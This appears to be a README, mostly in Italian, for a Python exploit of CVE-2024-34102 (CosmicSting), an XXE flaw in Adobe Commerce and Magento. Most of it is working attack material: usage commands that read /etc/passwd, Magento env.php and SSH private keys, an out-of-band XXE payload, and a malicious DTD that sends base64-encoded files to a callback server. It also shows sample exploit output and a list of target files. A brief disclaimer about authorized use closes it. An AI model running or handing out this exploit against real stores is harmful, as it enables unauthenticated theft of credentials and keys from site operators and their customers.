
Exploit di CVE-2024-34102 per python3
Exploit per CVE-2024-34102 (CosmicSting) - vulnerabilità XML External Entity (XXE) in Adobe Commerce e Magento.
CVE-2024-34102 è una vulnerabilità XXE critica che colpisce:
Questa vulnerabilità consente a un utente malintenzionato non autenticato di:
Punteggio CVSS: 9.8 (Critico)
Questo exploit si basa sul lavoro originale di:
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102
# Install dependencies
pip install -r requirements.txt
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com
Terminale 1 - Server DTD:
sudo python3 server_dtd.py
Terminale 2 - Exploit:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com \
--dtd-server YOUR-IP:8000
Terminale 1 - Server DTD:
sudo python3 server_dtd.py
Terminale 2 - Server di callback (decodifica automatica):
sudo python3 callback_server.py
Terminale 3 - Exploit:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c YOUR-CALLBACK-IP \
--dtd-server YOUR-DTD-IP:8000
-u, --url - URL del target (dominio di base)-f, --file - File da leggere dal server (es. /etc/passwd)-c, --callback - Server di callback (IP/dominio)--dtd-server - Server personalizzato per ospitare il file DTD--https - Usa HTTPS per il callback (predefinito: HTTP)python3 exploit.py \
-u https://vulnerable-site.com \
-f /etc/passwd \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /var/www/html/app/etc/env.php \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /home/ubuntu/.ssh/id_rsa \
-c abc123.burpcollaborator.net \
--dtd-server 192.168.1.100:8000 \
--https
L'exploit utilizza la tecnica XXE Out-of-Band per esfiltrare i dati:
<!-- Payload sent to target -->
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
Il server target scarica il DTD malintenzionato:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">
Il server elabora l'XML, legge il file, lo codifica in base64 e lo invia al callback:
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
DTD will be dynamically generated with:
[*] Callback: http://abc123.oastify.com
[*] File: /etc/passwd
DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...
=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>
To decode the exfiltrated data:
[*] echo 'BASE64_STRING' | base64 -d
[!] Check your Burp Collaborator or Oastify dashboard now!
Rilevamento:
/rest/V1/guest-carts/*/estimate-shipping-methods<!ENTITY>)Mitigazione:
File interessanti da testare:
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ
This exploit is provided for educational and security research purposes only.
Using this code to test systems without explicit authorization is ILLEGAL.
You are SOLELY responsible for your actions. Use only on:
✅ Your own test environments
✅ Authorized bug bounty programs
✅ Contracted penetration tests
DO NOT use on:
❌ Systems without authorization
❌ Production environments without permission
❌ Any malicious activity
The author is not responsible for misuse of this code.
⭐ Se questo progetto ti è stato utile, valuta di lasciare una stella!